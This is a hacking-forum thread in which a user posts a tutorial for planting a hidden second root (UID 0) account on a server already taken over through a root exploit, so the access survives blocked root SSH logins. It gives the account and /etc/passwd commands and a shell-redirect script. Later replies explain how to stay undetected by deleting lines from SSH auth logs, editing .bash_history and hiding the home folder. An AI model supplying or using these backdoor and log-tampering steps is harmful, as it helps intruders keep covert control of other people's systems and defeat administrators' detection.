Tutorial How to create a second root account with SSH access

Tutorial How to create a second root account with SSH access - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Website & Server Hacking (https://sinister.ly/Forum-Website-Server-Hacking)
+--- Thread: Tutorial How to create a second root account with SSH access (/Thread-Tutorial-How-to-create-a-second-root-account-with-SSH-access)

How to create a second root account with SSH access - Nohbdy - 11-29-2012

I've implemented a method to log in as root even in server's that have root access disabled. Pro's: It's automatic (so to speak); Con's: It requires two passwords and a bit of funky code.

So, first step is to create your backup login and an appropriate root login. You can use root, however, considering the audience I have on this site, I'll assume you probably don't know the primary root's password and don't want to change it in order to avoid detection.

What you want to do is create two users. Do so as such.

Code:
adduser nohbdy

adduser nohbdy_root

passwd nohbdy

passwd nohbdy_root

Of course, replace nohbdy with whatever you please. Just make sure that you add both accounts and set the password.

After that, you need to edit the /etc/passwd file so that the alternate root user is UID=0 and GID=0. Look for the line that defines your new root user, and make the 500/1000 like numbers both 0's.

Make a file in the proxy user's directory (in my case /home/nohbdy) with the following code:

Code:
#!/bin/sh

su -l nohbdy_root

Make the file executable to the user you created, and edit the /etc/passwd to replace the /bin/sh or /bin/bash on the proxy users line to point to this file (ie, change the shell to /home/nohbdy/root.sh).

Log into the proxy user and test that it works. A common issue is that you pointed the su -l part to your proxy user as opposed to the root user.

There you have it. You have a root user that works even when ssh blocks root login.

RE: How to create a second root account with SSH access - Dismas - 11-29-2012

Neat tutorial.
I think it's the first you've made too, right? Biggrin

RE: How to create a second root account with SSH access - Antics - 11-29-2012

Very simple and easy to read Tutorial.
Great work!

RE: How to create a second root account with SSH access - Nohbdy - 11-29-2012

(11-29-2012, 08:50 PM)The Anarchist Wrote: Neat tutorial.
I think it's the first you've made too, right?

Is it that obvious?

Nah, I've got one or two on my blog.

RE: How to create a second root account with SSH access - Nohbdy - 12-01-2012

(12-01-2012, 12:28 PM)SUFtTm9vYgo= Wrote: Hi! :blackhat:
I finally registered myself
I have some question to ask because i don't understand this tut.

1) Do you already have the root access on the machine? to create 2 user account i think you must have the password of root
2) when is better to use this tut? in what context?
3) why not simply ssh simpleuser@machine and than su root? To create user and change /etc/* files i think that you own or you have all access to that machine.
4) why not simply add nohbdy_root to root group ?
thats all folks

1. Yeah. This can be used when you have a root exploit of sorts.
2. When you want your root access to be relatively invisible.
3. What if you don't know the root password?
4. Because nohbdy_root needs uid=0 else it can't do root things.

RE: How to create a second root account with SSH access - Bannedshee - 12-01-2012

Nice tutorial, and yeah i have never actually seen you make a tutorial on AF

RE: How to create a second root account with SSH access - Nohbdy - 12-01-2012

(12-01-2012, 06:33 PM)SUFtTm9vYgo= Wrote:
(12-01-2012, 02:45 PM)Nohbdy Wrote: 1. Yeah. This can be used when you have a root exploit of sorts.
ok, i will explot the machine, and have a root access

(12-01-2012, 02:45 PM)Nohbdy Wrote: 2. When you want your root access to be relatively invisible.
ok I will create 2 users. I will use ssh and login with normal user

(12-01-2012, 02:45 PM)Nohbdy Wrote: 3. What if you don't know the root password?
OK, i can do root activity either without pass because i use exploits, and i am a noob if i reset root pass.

(12-01-2012, 02:45 PM)Nohbdy Wrote: 4. Because nohbdy_root needs uid=0 else it can't do root things.
so if the administrator do id nohbdy_root he not see the user in the root group?

But isn't better if i exploit the machin to use a reverce shel, or a php/ajax shell, without doing a new user?
what is better?

This tutorial was intended to be a tool in your toolbox, not an exclusive use.

Quote:I have more question, but not related to this tut
1) what about ssh logs? you are clearly using a new user, any admn that read the log, can see that you own the machine

SSH logs are stored in /var/log/auth.log (debian-based) or /var/log/secure (rhel-based). You can eliminate single lines from this file.

Quote:2) what to do with , bash_history? the file in the nohbdy folder? is there a way to hide them?

Realistically, you can edit the .bash_history file, and the nohbdy folder you can prepend a . and most people won't notice. Just make sure if you prepend a . to the nohbdy folder (so like /home/.nohbdy) you update /etc/passwd.

Quote:thanks
:blackhat: